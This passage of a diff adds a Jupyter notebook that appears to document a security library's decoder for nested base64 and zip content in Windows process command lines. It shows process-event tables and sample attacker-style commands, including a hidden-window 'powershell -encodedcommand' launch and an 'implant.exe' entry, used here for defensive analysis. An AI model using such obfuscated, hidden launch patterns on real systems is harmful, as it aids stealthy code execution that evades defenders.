+       "      <td>c1f6c05bdbe28a58557a9477cd0fa96fbc5e7c54ceb605...</td>\n",
+       "      <td>69 a6 9a 69 a6 9a 69 a6 9a 69 a6 9a 69 a6 9a 6...</td>\n",
+       "      <td>41.0</td>\n",
+       "      <td>cmd  /c \"echo # &lt;decoded value='binary'  name=...</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>44</th>\n",
+       "      <td>802d39e1-9d70-404d-832c-2de5e2478eda</td>\n",
+       "      <td>MSTICAlertsWin1\\MSTICAdmin</td>\n",
+       "      <td>4688</td>\n",
+       "      <td>2019-01-15 05:15:12.003</td>\n",
+       "      <td>MSTICAlertsWin1</td>\n",
+       "      <td>S-1-5-21-996632719-2361334927-4038480536-500</td>\n",
+       "      <td>MSTICAdmin</td>\n",
+       "      <td>MSTICAlertsWin1</td>\n",
+       "      <td>0xfaac27</td>\n",
+       "      <td>0x1250</td>\n",
+       "      <td>...</td>\n",
+       "      <td>b'\\xf3W\\x9d\\xd3w\\x1a\\x7f\\xaft\\xd5\\xee8\\xe1\\xce...</td>\n",
+       "      <td>None</td>\n",
+       "      <td>binary</td>\n",
+       "      <td>{'md5': '1c8cc6299bd654bbcd85710968d6a87c', 's...</td>\n",
+       "      <td>1c8cc6299bd654bbcd85710968d6a87c</td>\n",
+       "      <td>55377391141f59a2ff5ae4765d9f0b4438adfd73</td>\n",
+       "      <td>fd80ceba7cfb49d296886c10d9a3497d63c89a589587cd...</td>\n",
+       "      <td>f3 57 9d d3 77 1a 7f af 74 d5 ee 38 e1 ce f6 6...</td>\n",
+       "      <td>44.0</td>\n",
+       "      <td>implant.exe  &lt;decoded value='binary'  name='[N...</td>\n",
+       "    </tr>\n",
+       "  </tbody>\n",
+       "</table>\n",
+       "<p>4 rows × 36 columns</p>\n",
+       "</div>"
+      ],
+      "text/plain": [
+       "                                         TenantId                     Account  \\\n",
+       "SourceIndex                                                                     \n",
+       "39           802d39e1-9d70-404d-832c-2de5e2478eda  MSTICAlertsWin1\\MSTICAdmin   \n",
+       "40           802d39e1-9d70-404d-832c-2de5e2478eda  MSTICAlertsWin1\\MSTICAdmin   \n",
+       "41           802d39e1-9d70-404d-832c-2de5e2478eda  MSTICAlertsWin1\\MSTICAdmin   \n",
+       "44           802d39e1-9d70-404d-832c-2de5e2478eda  MSTICAlertsWin1\\MSTICAdmin   \n",
+       "\n",
+       "             EventID           TimeGenerated         Computer  \\\n",
+       "SourceIndex                                                     \n",
+       "39              4688 2019-01-15 05:15:13.567  MSTICAlertsWin1   \n",
+       "40              4688 2019-01-15 05:15:13.683  MSTICAlertsWin1   \n",
+       "41              4688 2019-01-15 05:15:13.793  MSTICAlertsWin1   \n",
+       "44              4688 2019-01-15 05:15:12.003  MSTICAlertsWin1   \n",
+       "\n",
+       "                                           SubjectUserSid SubjectUserName  \\\n",
+       "SourceIndex                                                                 \n",
+       "39           S-1-5-21-996632719-2361334927-4038480536-500      MSTICAdmin   \n",
+       "40           S-1-5-21-996632719-2361334927-4038480536-500      MSTICAdmin   \n",
+       "41           S-1-5-21-996632719-2361334927-4038480536-500      MSTICAdmin   \n",
+       "44           S-1-5-21-996632719-2361334927-4038480536-500      MSTICAdmin   \n",
+       "\n",
+       "            SubjectDomainName SubjectLogonId NewProcessId  ...  \\\n",
+       "SourceIndex                                                ...   \n",
+       "39            MSTICAlertsWin1       0xfaac27       0x1684  ...   \n",
+       "40            MSTICAlertsWin1       0xfaac27       0x16b8  ...   \n",
+       "41            MSTICAlertsWin1       0xfaac27       0x16ec  ...   \n",
+       "44            MSTICAlertsWin1       0xfaac27       0x1250  ...   \n",
+       "\n",
+       "                                                   input_bytes  \\\n",
+       "SourceIndex                                                      \n",
+       "39           b\"$\\x00t\\x00 \\x00=\\x00 \\x00'\\x00d\\x00i\\x00r\\x0...   \n",
+       "40           b'i\\xa6\\x9ai\\xa6\\x9ai\\xa6\\x9ai\\xa6\\x9ai\\xa6\\x9...   \n",
+       "41           b'i\\xa6\\x9ai\\xa6\\x9ai\\xa6\\x9ai\\xa6\\x9ai\\xa6\\x9...   \n",
+       "44           b'\\xf3W\\x9d\\xd3w\\x1a\\x7f\\xaft\\xd5\\xee8\\xe1\\xce...   \n",
+       "\n",
+       "                                                decoded_string encoding_type  \\\n",
+       "SourceIndex                                                                    \n",
+       "39           $\u0000t\u0000 \u0000=\u0000 \u0000'\u0000d\u0000i\u0000r\u0000'\u0000;\u0000\\r\u0000\\n\u0000&\u0000 \u0000(\u0000'\u0000I\u0000n\u0000v\u0000o\u0000k\u0000...         utf-8   \n",
+       "40                                                        None        binary   \n",
+       "41                                                        None        binary   \n",
+       "44                                                        None        binary   \n",
+       "\n",
+       "                                                   file_hashes  \\\n",
+       "SourceIndex                                                      \n",
+       "39           {'md5': '6cd1486db221e532cc2011c9beeb4ffc', 's...   \n",
+       "40           {'md5': '9a45b2520e930dc9186f6d93a7798a13', 's...   \n",
+       "41           {'md5': '9a45b2520e930dc9186f6d93a7798a13', 's...   \n",
+       "44           {'md5': '1c8cc6299bd654bbcd85710968d6a87c', 's...   \n",
+       "\n",
+       "                                          md5  \\\n",
+       "SourceIndex                                     \n",
+       "39           6cd1486db221e532cc2011c9beeb4ffc   \n",
+       "40           9a45b2520e930dc9186f6d93a7798a13   \n",
+       "41           9a45b2520e930dc9186f6d93a7798a13   \n",
+       "44           1c8cc6299bd654bbcd85710968d6a87c   \n",
+       "\n",
+       "                                                 sha1  \\\n",
+       "SourceIndex                                             \n",
+       "39           6e485467d7e06502046b7c84a8ef067cfe1512ad   \n",
+       "40           f526c90fa0744e3a63d84421ff25e3f5a3d697cb   \n",
+       "41           f526c90fa0744e3a63d84421ff25e3f5a3d697cb   \n",
+       "44           55377391141f59a2ff5ae4765d9f0b4438adfd73   \n",
+       "\n",
+       "                                                        sha256  \\\n",
+       "SourceIndex                                                      \n",
+       "39           d3291dab1ae552b91e6b50d7460ceaa39f6f92b2cda433...   \n",
+       "40           c1f6c05bdbe28a58557a9477cd0fa96fbc5e7c54ceb605...   \n",
+       "41           c1f6c05bdbe28a58557a9477cd0fa96fbc5e7c54ceb605...   \n",
+       "44           fd80ceba7cfb49d296886c10d9a3497d63c89a589587cd...   \n",
+       "\n",
+       "                                               printable_bytes src_index  \\\n",
+       "SourceIndex                                                                \n",
+       "39           24 00 74 00 20 00 3d 00 20 00 27 00 64 00 69 0...      39.0   \n",
+       "40           69 a6 9a 69 a6 9a 69 a6 9a 69 a6 9a 69 a6 9a 6...      40.0   \n",
+       "41           69 a6 9a 69 a6 9a 69 a6 9a 69 a6 9a 69 a6 9a 6...      41.0   \n",
+       "44           f3 57 9d d3 77 1a 7f af 74 d5 ee 38 e1 ce f6 6...      44.0   \n",
+       "\n",
+       "                                           full_decoded_string  \n",
+       "SourceIndex                                                     \n",
+       "39           .\\powershell  -enc <decoded type='string' name...  \n",
+       "40           cmd  /c \"echo # <decoded value='binary'  name=...  \n",
+       "41           cmd  /c \"echo # <decoded value='binary'  name=...  \n",
+       "44           implant.exe  <decoded value='binary'  name='[N...  \n",
+       "\n",
+       "[4 rows x 36 columns]"
+      ]
+     },
+     "execution_count": 6,
+     "metadata": {},
+     "output_type": "execute_result"
+    }
+   ],
+   "source": [
+    "# Set the type of the SourceIndex column. \n",
+    "dec_df['SourceIndex'] = pd.to_numeric(dec_df['src_index'])\n",
+    "merged_df = (process_tree\n",
+    "             .merge(right=dec_df, how='left', left_index=True, right_on='SourceIndex')\n",
+    "             .drop(columns=['Unnamed: 0'])\n",
+    "             .set_index('SourceIndex'))\n",
+    "\n",
+    "# Show the result of the merge (only those rows that have a value in original_string)\n",
+    "merged_df.dropna(subset=['original_string'])\n",
+    "\n",
+    "# Note the output of unpack_items() may have multiple rows (for nested encodings) \n",
+    "# In this case merged DF will have duplicate rows from the source."
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "<a id='nested_encodings'></a>[Contents](#contents)\n",
+    "## Decoding Nested Base64/Archives\n",
+    "The module will try to follow nested encodings. It uses the following algorithm:\n",
+    "1. Search for a pattern in the input that looks like a Base64 encoded string\n",
+    "2. If not a known undecodable_string, try to decode the matched pattern.\n",
+    "   - If the base 64 string matches a known archive type (zip, tar, gzip) also decompress or unpack\n",
+    "     - For multi-item archives (zip, tar) process each contained item recursively (i.e. go to item 1. with \n",
+    "      child item as input)\n",
+    "   - For anything that decodes to a UTF-8 or UTF-16 string replace the input pattern with the decoded string\n",
+    "   - Recurse over resultant output (i.e. submit decoded/replaced string to 1.)\n",
+    "3. If decoding fails, add to list of undecodable_strings (prevents infinite looping over something that looks like a base64 string but isn't)"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 7,
+   "metadata": {
+    "ExecuteTime": {
+     "end_time": "2020-02-06T01:06:47.275122Z",
+     "start_time": "2020-02-06T01:06:47.260131Z"
+    },
+    "scrolled": true
+   },
+   "outputs": [
+    {
+     "name": "stdout",
+     "output_type": "stream",
+     "text": [
+      "\n",
+      "powershell.exe  -nop -w hidden -encodedcommand \n",
+      "<decoded value='multiple binary' type='multiple' index='1' depth='1'>\n",
+      "<decoded value='binary'  name='[zip] Filename: PeDll.dll' type='zip' index='1.1' depth='2'>3e 7b f4 bf 50 41 33 30 01 23 9d 3f 8d 4c d4 01 b0 5e 08 d0 3f c4 0c 01 a0 71 00 50 08 21 9c a6 12 1a 66 81 4b 3f a9 a6 d3 9e 53 60 80 22 01 03 00 00 80 00 00 00 00 00 00 00 00 18 c0 83 f6 fc 01 60 2d aa aa aa aa aa aa aa aa aa aa aa 0a aa aa 1a 1a 80 a1 2d aa aa aa aa aa aa aa aa aa 2a a2 11 fa c8 00 e8 7f 01 60 fd 07 c0 ff 05 80 ff 07 c0 ff 05 40 ff 01 46 00 b3 03 40 28 87 91 69 76 00 c8 20 a3 03 00 20 62 13</decoded>\n",
+      "<decoded type='string' name='[zip] Filename: b64inzip.foo' index='1.2' depth='2'>Base64 encoded string in zip file</decoded>\n",
+      "<decoded type='string' name='[zip] Filename: PlainTextInZip.dll' index='1.3' depth='2'>Unencoded text file in zip</decoded></decoded>\n"
+     ]
+    }
+   ],
+   "source": [
+    "encoded_cmd = '''\n",
+    "powershell.exe  -nop -w hidden -encodedcommand \n",
+    "UEsDBBQAAAAIAGBXkk3LfdszdwAAAIoAAAAJAAAAUGVEbGwuZGxss6v+sj/A0diA\n",
+    "UXmufa/PFcYNcRwX7I/wMC4oZAjgUJyzTEgqrdHbfuWyy/OCExqUGJkZGBoYoEDi\n",
+    "QPO3P4wJuqsQgGvVKimphoUIIa1Fgr9OMLyoZ0z4y37gP2vDfxDp8J/RjWEzs4NG\n",
+    "+8TMMoYTCouZGRSShAFQSwMEFAAAAAAAYYJrThx8YzUhAAAAIQAAAAwAAABiNjRp\n",
+    "bnppcC5mb29CYXNlNjQgZW5jb2RlZCBzdHJpbmcgaW4gemlwIGZpbGVQSwMEFAAA\n",
+    "AAAAi4JrTvMfsJUaAAAAGgAAABIAAABQbGFpblRleHRJblppcC5kbGxVbmVuY29k\n",
+    "ZWQgdGV4dCBmaWxlIGluIHppcFBLAQIUABQAAAAIAGBXkk3LfdszdwAAAIoAAAAJ\n",
+    "AAAAAAAAAAAAIAAAAAAAAABQZURsbC5kbGxQSwECFAAUAAAAAABhgmtOHHxjNSEA\n",
+    "AAAhAAAADAAAAAAAAAABACAAAACeAAAAYjY0aW56aXAuZm9vUEsBAhQAFAAAAAAA\n",
+    "i4JrTvMfsJUaAAAAGgAAABIAAAAAAAAAAQAgAAAA6QAAAFBsYWluVGV4dEluWmlw\n",
+    "LmRsbFBLBQYAAAAAAwADALEAAAAzAQAAAAA='''\n",
+    "\n",
+    "import re\n",
+    "dec_string, dec_df = base64.unpack(input_string=encoded_cmd)\n",
+    "print(dec_string.replace('<decoded', '\\n<decoded'))"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "## IPython magic\n",
+    "\n",
+    "You can use the line magic `%b64` or cell magic `%%b64` to decode text directly in a cell\n",
+    "\n",
+    "The b64 magic supports the following options:\n",
+    "\n",
+    "```\n",
+    "--out OUT, -o OUT  The variable to return the results in the variable `OUT`\n",
+    "                   Note: the output is a tuple of decoded string and pandas DataFrame\n",
+    "--pretty, -p       Print formatted version of output (if you `print` the output)\n",
+    "--clean, -c        Print decoded string with no formatting\n",
+    "```"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 8,
+   "metadata": {
+    "ExecuteTime": {
+     "end_time": "2020-02-06T01:06:47.290113Z",
+     "start_time": "2020-02-06T01:06:47.276122Z"
+    }
+   },
+   "outputs": [
+    {
+     "data": {
+      "text/plain": [
+       "'<?xml version=\"1.0\" encoding=\"utf-8\"?>\\n<decoded_string>\\n powershell.exe  -nop -w hidden -encodedcommand\\n <decoded depth=\"1\" index=\"1\" type=\"multiple\" value=\"multiple binary\">\\n  <decoded depth=\"2\" index=\"1.1\" name=\"[zip] Filename: PeDll.dll\" type=\"zip\" value=\"binary\">\\n   3e 7b f4 bf 50 41 33 30 01 23 9d 3f 8d 4c d4 01 b0 5e 08 d0 3f c4 0c 01 a0 71 00 50 08 21 9c a6 12 1a 66 81 4b 3f a9 a6 d3 9e 53 60 80 22 01 03 00 00 80 00 00 00 00 00 00 00 00 18 c0 83 f6 fc 01 60 2d aa aa aa aa aa aa aa aa aa aa aa 0a aa aa 1a 1a 80 a1 2d aa aa aa aa aa aa aa aa aa 2a a2 11 fa c8 00 e8 7f 01 60 fd 07 c0 ff 05 80 ff 07 c0 ff 05 40 ff 01 46 00 b3 03 40 28 87 91 69 76 00 c8 20 a3 03 00 20 62 13\\n  </decoded>\\n  <decoded depth=\"2\" index=\"1.2\" name=\"[zip] Filename: b64inzip.foo\" type=\"string\">\\n   Base64 encoded string in zip file\\n  </decoded>\\n  <decoded depth=\"2\" index=\"1.3\" name=\"[zip] Filename: PlainTextInZip.dll\" type=\"string\">\\n   Unencoded text file in zip\\n  </decoded>\\n </decoded>\\n</decoded_string>'"
+      ]
+     },
+     "execution_count": 8,
+     "metadata": {},
+     "output_type": "execute_result"
+    }
+   ],
+   "source": [
+    "%%b64 --pretty --out dec_xml\n",
+    "powershell.exe  -nop -w hidden -encodedcommand \n",
+    "UEsDBBQAAAAIAGBXkk3LfdszdwAAAIoAAAAJAAAAUGVEbGwuZGxss6v+sj/A0diA\n",
+    "UXmufa/PFcYNcRwX7I/wMC4oZAjgUJyzTEgqrdHbfuWyy/OCExqUGJkZGBoYoEDi\n",
+    "QPO3P4wJuqsQgGvVKimphoUIIa1Fgr9OMLyoZ0z4y37gP2vDfxDp8J/RjWEzs4NG\n",
+    "+8TMMoYTCouZGRSShAFQSwMEFAAAAAAAYYJrThx8YzUhAAAAIQAAAAwAAABiNjRp\n",
+    "bnppcC5mb29CYXNlNjQgZW5jb2RlZCBzdHJpbmcgaW4gemlwIGZpbGVQSwMEFAAA\n",
+    "AAAAi4JrTvMfsJUaAAAAGgAAABIAAABQbGFpblRleHRJblppcC5kbGxVbmVuY29k\n",
+    "ZWQgdGV4dCBmaWxlIGluIHppcFBLAQIUABQAAAAIAGBXkk3LfdszdwAAAIoAAAAJ\n",
+    "AAAAAAAAAAAAIAAAAAAAAABQZURsbC5kbGxQSwECFAAUAAAAAABhgmtOHHxjNSEA\n",
+    "AAAhAAAADAAAAAAAAAABACAAAACeAAAAYjY0aW56aXAuZm9vUEsBAhQAFAAAAAAA\n",
+    "i4JrTvMfsJUaAAAAGgAAABIAAAAAAAAAAQAgAAAA6QAAAFBsYWluVGV4dEluWmlw\n",
+    "LmRsbFBLBQYAAAAAAwADALEAAAAzAQAAAAA="
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 9,
+   "metadata": {
+    "ExecuteTime": {
+     "end_time": "2020-02-06T01:06:47.294164Z",
+     "start_time": "2020-02-06T01:06:47.291113Z"
+    }
+   },
+   "outputs": [
+    {
+     "name": "stdout",
+     "output_type": "stream",
+     "text": [
+      "<?xml version=\"1.0\" encoding=\"utf-8\"?>\n",
+      "<decoded_string>\n",
+      " powershell.exe  -nop -w hidden -encodedcommand\n",
+      " <decoded depth=\"1\" index=\"1\" type=\"multiple\" value=\"multiple binary\">\n",
+      "  <decoded depth=\"2\" index=\"1.1\" name=\"[zip] Filename: PeDll.dll\" type=\"zip\" value=\"binary\">\n",
+      "   3e 7b f4 bf 50 41 33 30 01 23 9d 3f 8d 4c d4 01 b0 5e 08 d0 3f c4 0c 01 a0 71 00 50 08 21 9c a6 12 1a 66 81 4b 3f a9 a6 d3 9e 53 60 80 22 01 03 00 00 80 00 00 00 00 00 00 00 00 18 c0 83 f6 fc 01 60 2d aa aa aa aa aa aa aa aa aa aa aa 0a aa aa 1a 1a 80 a1 2d aa aa aa aa aa aa aa aa aa 2a a2 11 fa c8 00 e8 7f 01 60 fd 07 c0 ff 05 80 ff 07 c0 ff 05 40 ff 01 46 00 b3 03 40 28 87 91 69 76 00 c8 20 a3 03 00 20 62 13\n",
+      "  </decoded>\n",
+      "  <decoded depth=\"2\" index=\"1.2\" name=\"[zip] Filename: b64inzip.foo\" type=\"string\">\n",
+      "   Base64 encoded string in zip file\n",
+      "  </decoded>\n",
+      "  <decoded depth=\"2\" index=\"1.3\" name=\"[zip] Filename: PlainTextInZip.dll\" type=\"string\">\n",
+      "   Unencoded text file in zip\n",
+      "  </decoded>\n",
+      " </decoded>\n",
+      "</decoded_string>\n"
+     ]
+    }
+   ],
+   "source": [
+    "print(dec_xml[0])"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "## Pandas Extension\n",
+    "\n",
+    "The decoding functionality is also available in a pandas extension `mp_b64`.\n",
+    "This supports a single method `extract()`. \n",
+    "\n",
+    "This supports the same syntax\n",
+    "as `unpack_df` (described earlier)."
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 10,
+   "metadata": {
+    "ExecuteTime": {
+     "end_time": "2020-02-06T01:06:47.360891Z",
+     "start_time": "2020-02-06T01:06:47.295155Z"
+    }
+   },
+   "outputs": [
+    {
+     "data": {
+      "text/html": [
+       "<div>\n",
+       "<style scoped>\n",
+       "    .dataframe tbody tr th:only-of-type {\n",
+       "        vertical-align: middle;\n",
+       "    }\n",
+       "\n",
+       "    .dataframe tbody tr th {\n",
+       "        vertical-align: top;\n",
+       "    }\n",
+       "\n",
+       "    .dataframe thead th {\n",
+       "        text-align: right;\n",
+       "    }\n",
+       "</style>\n",
+       "<table border=\"1\" class=\"dataframe\">\n",
+       "  <thead>\n",
+       "    <tr style=\"text-align: right;\">\n",
+       "      <th></th>\n",
+       "      <th>reference</th>\n",
+       "      <th>original_string</th>\n",
+       "      <th>file_name</th>\n",
+       "      <th>file_type</th>\n",
+       "      <th>input_bytes</th>\n",
+       "      <th>decoded_string</th>\n",
+       "      <th>encoding_type</th>\n",
+       "      <th>file_hashes</th>\n",
+       "      <th>md5</th>\n",
+       "      <th>sha1</th>\n",
+       "      <th>sha256</th>\n",
+       "      <th>printable_bytes</th>\n",
+       "      <th>src_index</th>\n",
+       "      <th>full_decoded_string</th>\n",
+       "    </tr>\n",
+       "  </thead>\n",
+       "  <tbody>\n",
+       "    <tr>\n",
+       "      <th>0</th>\n",
+       "      <td>(, 1., 1)</td>\n",
+       "      <td>JAB0ACAAPQAgACcAZABpAHIAJwA7AA0ACgAmACAAKAAnAE...</td>\n",
+       "      <td>unknown</td>\n",
+       "      <td>None</td>\n",
+       "      <td>b\"$\\x00t\\x00 \\x00=\\x00 \\x00'\\x00d\\x00i\\x00r\\x0...</td>\n",
+       "      <td>$\u0000t\u0000 \u0000=\u0000 \u0000'\u0000d\u0000i\u0000r\u0000'\u0000;\u0000\\r\u0000\\n\u0000&amp;\u0000 \u0000(\u0000'\u0000I\u0000n\u0000v\u0000o\u0000k\u0000...</td>\n",
+       "      <td>utf-8</td>\n",
+       "      <td>{'md5': '6cd1486db221e532cc2011c9beeb4ffc', 's...</td>\n",
+       "      <td>6cd1486db221e532cc2011c9beeb4ffc</td>\n",
+       "      <td>6e485467d7e06502046b7c84a8ef067cfe1512ad</td>\n",
+       "      <td>d3291dab1ae552b91e6b50d7460ceaa39f6f92b2cda433...</td>\n",
+       "      <td>24 00 74 00 20 00 3d 00 20 00 27 00 64 00 69 0...</td>\n",
+       "      <td>39</td>\n",
+       "      <td>.\\powershell  -enc &lt;decoded type='string' name...</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>1</th>\n",
+       "      <td>(, 1., 1)</td>\n",
+       "      <td>aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa</td>\n",
+       "      <td>unknown</td>\n",
+       "      <td>None</td>\n",
+       "      <td>b'i\\xa6\\x9ai\\xa6\\x9ai\\xa6\\x9ai\\xa6\\x9ai\\xa6\\x9...</td>\n",
+       "      <td>None</td>\n",
+       "      <td>binary</td>\n",
+       "      <td>{'md5': '9a45b2520e930dc9186f6d93a7798a13', 's...</td>\n",
+       "      <td>9a45b2520e930dc9186f6d93a7798a13</td>\n",
+       "      <td>f526c90fa0744e3a63d84421ff25e3f5a3d697cb</td>\n",
+       "      <td>c1f6c05bdbe28a58557a9477cd0fa96fbc5e7c54ceb605...</td>\n",
+       "      <td>69 a6 9a 69 a6 9a 69 a6 9a 69 a6 9a 69 a6 9a 6...</td>\n",
+       "      <td>40</td>\n",
+       "      <td>cmd  /c \"echo # &lt;decoded value='binary'  name=...</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>2</th>\n",
+       "      <td>(, 1., 1)</td>\n",
+       "      <td>aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa</td>\n",
+       "      <td>unknown</td>\n",
+       "      <td>None</td>\n",
+       "      <td>b'i\\xa6\\x9ai\\xa6\\x9ai\\xa6\\x9ai\\xa6\\x9ai\\xa6\\x9...</td>\n",
+       "      <td>None</td>\n",
+       "      <td>binary</td>\n",
+       "      <td>{'md5': '9a45b2520e930dc9186f6d93a7798a13', 's...</td>\n",
+       "      <td>9a45b2520e930dc9186f6d93a7798a13</td>\n",
+       "      <td>f526c90fa0744e3a63d84421ff25e3f5a3d697cb</td>\n",
+       "      <td>c1f6c05bdbe28a58557a9477cd0fa96fbc5e7c54ceb605...</td>\n",
+       "      <td>69 a6 9a 69 a6 9a 69 a6 9a 69 a6 9a 69 a6 9a 6...</td>\n",
+       "      <td>41</td>\n",
+       "      <td>cmd  /c \"echo # &lt;decoded value='binary'  name=...</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>3</th>\n",
+       "      <td>(, 1., 1)</td>\n",
+       "      <td>81ed03caf6901e444c72ac67d192fb9c</td>\n",
+       "      <td>unknown</td>\n",
+       "      <td>None</td>\n",
+       "      <td>b'\\xf3W\\x9d\\xd3w\\x1a\\x7f\\xaft\\xd5\\xee8\\xe1\\xce...</td>\n",
+       "      <td>None</td>\n",
+       "      <td>binary</td>\n",
+       "      <td>{'md5': '1c8cc6299bd654bbcd85710968d6a87c', 's...</td>\n",
+       "      <td>1c8cc6299bd654bbcd85710968d6a87c</td>\n",
+       "      <td>55377391141f59a2ff5ae4765d9f0b4438adfd73</td>\n",
+       "      <td>fd80ceba7cfb49d296886c10d9a3497d63c89a589587cd...</td>\n",
+       "      <td>f3 57 9d d3 77 1a 7f af 74 d5 ee 38 e1 ce f6 6...</td>\n",
+       "      <td>44</td>\n",
+       "      <td>implant.exe  &lt;decoded value='binary'  name='[N...</td>\n",
+       "    </tr>\n",
+       "  </tbody>\n",
+       "</table>\n",
+       "</div>"
+      ],
+      "text/plain": [
+       "   reference                                    original_string file_name  \\\n",
+       "0  (, 1., 1)  JAB0ACAAPQAgACcAZABpAHIAJwA7AA0ACgAmACAAKAAnAE...   unknown   \n",
+       "1  (, 1., 1)                   aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa   unknown   \n",
+       "2  (, 1., 1)                   aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa   unknown   \n",
+       "3  (, 1., 1)                   81ed03caf6901e444c72ac67d192fb9c   unknown   \n",
+       "\n",
+       "  file_type                                        input_bytes  \\\n",
+       "0      None  b\"$\\x00t\\x00 \\x00=\\x00 \\x00'\\x00d\\x00i\\x00r\\x0...   \n",
+       "1      None  b'i\\xa6\\x9ai\\xa6\\x9ai\\xa6\\x9ai\\xa6\\x9ai\\xa6\\x9...   \n",
+       "2      None  b'i\\xa6\\x9ai\\xa6\\x9ai\\xa6\\x9ai\\xa6\\x9ai\\xa6\\x9...   \n",
+       "3      None  b'\\xf3W\\x9d\\xd3w\\x1a\\x7f\\xaft\\xd5\\xee8\\xe1\\xce...   \n",
+       "\n",
+       "                                      decoded_string encoding_type  \\\n",
+       "0  $\u0000t\u0000 \u0000=\u0000 \u0000'\u0000d\u0000i\u0000r\u0000'\u0000;\u0000\\r\u0000\\n\u0000&\u0000 \u0000(\u0000'\u0000I\u0000n\u0000v\u0000o\u0000k\u0000...         utf-8   \n",
+       "1                                               None        binary   \n",
+       "2                                               None        binary   \n",
+       "3                                               None        binary   \n",
+       "\n",
+       "                                         file_hashes  \\\n",
+       "0  {'md5': '6cd1486db221e532cc2011c9beeb4ffc', 's...   \n",
+       "1  {'md5': '9a45b2520e930dc9186f6d93a7798a13', 's...   \n",
+       "2  {'md5': '9a45b2520e930dc9186f6d93a7798a13', 's...   \n",
+       "3  {'md5': '1c8cc6299bd654bbcd85710968d6a87c', 's...   \n",
+       "\n",
+       "                                md5                                      sha1  \\\n",
+       "0  6cd1486db221e532cc2011c9beeb4ffc  6e485467d7e06502046b7c84a8ef067cfe1512ad   \n",
+       "1  9a45b2520e930dc9186f6d93a7798a13  f526c90fa0744e3a63d84421ff25e3f5a3d697cb   \n",
+       "2  9a45b2520e930dc9186f6d93a7798a13  f526c90fa0744e3a63d84421ff25e3f5a3d697cb   \n",
+       "3  1c8cc6299bd654bbcd85710968d6a87c  55377391141f59a2ff5ae4765d9f0b4438adfd73   \n",
+       "\n",
+       "                                              sha256  \\\n",
+       "0  d3291dab1ae552b91e6b50d7460ceaa39f6f92b2cda433...   \n",
+       "1  c1f6c05bdbe28a58557a9477cd0fa96fbc5e7c54ceb605...   \n",
+       "2  c1f6c05bdbe28a58557a9477cd0fa96fbc5e7c54ceb605...   \n",
+       "3  fd80ceba7cfb49d296886c10d9a3497d63c89a589587cd...   \n",
+       "\n",
+       "                                     printable_bytes  src_index  \\\n",
+       "0  24 00 74 00 20 00 3d 00 20 00 27 00 64 00 69 0...         39   \n",
+       "1  69 a6 9a 69 a6 9a 69 a6 9a 69 a6 9a 69 a6 9a 6...         40   \n",
+       "2  69 a6 9a 69 a6 9a 69 a6 9a 69 a6 9a 69 a6 9a 6...         41   \n",
+       "3  f3 57 9d d3 77 1a 7f af 74 d5 ee 38 e1 ce f6 6...         44   \n",
+       "\n",
+       "                                 full_decoded_string  \n",
+       "0  .\\powershell  -enc <decoded type='string' name...  \n",
+       "1  cmd  /c \"echo # <decoded value='binary'  name=...  \n",
+       "2  cmd  /c \"echo # <decoded value='binary'  name=...  \n",
+       "3  implant.exe  <decoded value='binary'  name='[N...  "
+      ]
+     },
+     "execution_count": 10,
+     "metadata": {},
+     "output_type": "execute_result"
+    }
+   ],
+   "source": [
+    "process_tree.mp_b64.extract(column='CommandLine')"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "<a id='todos'></a>[Contents](#contents)\n",
+    "## To-Do Items\n",
+    "- Use more comprehensive list of binary magic numbers and match on byte values after decoding to get better file typing\n",
+    "- Output nested decodings in a more readable output\n"
+   ]
+  }
+ ],
+ "metadata": {
+  "celltoolbar": "Tags",
+  "hide_input": false,
+  "kernelspec": {
+   "display_name": "Python 3",
+   "language": "python",
+   "name": "python3"
+  },
+  "language_info": {
+   "codemirror_mode": {
+    "name": "ipython",
+    "version": 3
+   },
+   "file_extension": ".py",
+   "mimetype": "text/x-python",
+   "name": "python",
+   "nbconvert_exporter": "python",
+   "pygments_lexer": "ipython3",
+   "version": "3.7.9"
+  },
+  "latex_envs": {
+   "LaTeX_envs_menu_present": true,
+   "autoclose": false,
+   "autocomplete": true,
+   "bibliofile": "biblio.bib",
+   "cite_by": "apalike",
+   "current_citInitial": 1,
+   "eqLabelWithNumbers": true,
+   "eqNumInitial": 1,
+   "hotkeys": {
+    "equation": "Ctrl-E",
+    "itemize": "Ctrl-I"
+   },
+   "labels_anchors": false,
+   "latex_user_defs": false,
+   "report_style_numbering": false,
+   "user_envs_cfg": false
+  },
+  "toc": {
+   "base_numbering": 1,
+   "nav_menu": {
+    "height": "318.996px",
+    "width": "320.994px"
+   },
+   "number_sections": false,
+   "sideBar": true,
+   "skip_h1_title": false,
+   "title_cell": "Table of Contents",
+   "title_sidebar": "Contents",
+   "toc_cell": true,
+   "toc_position": {
+    "height": "calc(100% - 180px)",
+    "left": "10px",
+    "top": "150px",
+    "width": "165px"
+   },
+   "toc_section_display": true,
+   "toc_window_display": true
+  },
+  "varInspector": {
+   "cols": {
+    "lenName": 16,
+    "lenType": 16,
+    "lenVar": 40
+   },
+   "kernels_config": {
+    "python": {
+     "delete_cmd_postfix": "",
+     "delete_cmd_prefix": "del ",
+     "library": "var_list.py",
+     "varRefreshCmd": "print(var_dic_list())"
+    },
+    "r": {
+     "delete_cmd_postfix": ") ",
+     "delete_cmd_prefix": "rm(",
+     "library": "var_list.r",
+     "varRefreshCmd": "cat(var_dic_list()) "
+    }
+   },
+   "position": {
+    "height": "406.193px",
+    "left": "1468.4px",
+    "right": "20px",
+    "top": "120px",
+    "width": "456.572px"
+   },
+   "types_to_exclude": [
+    "module",
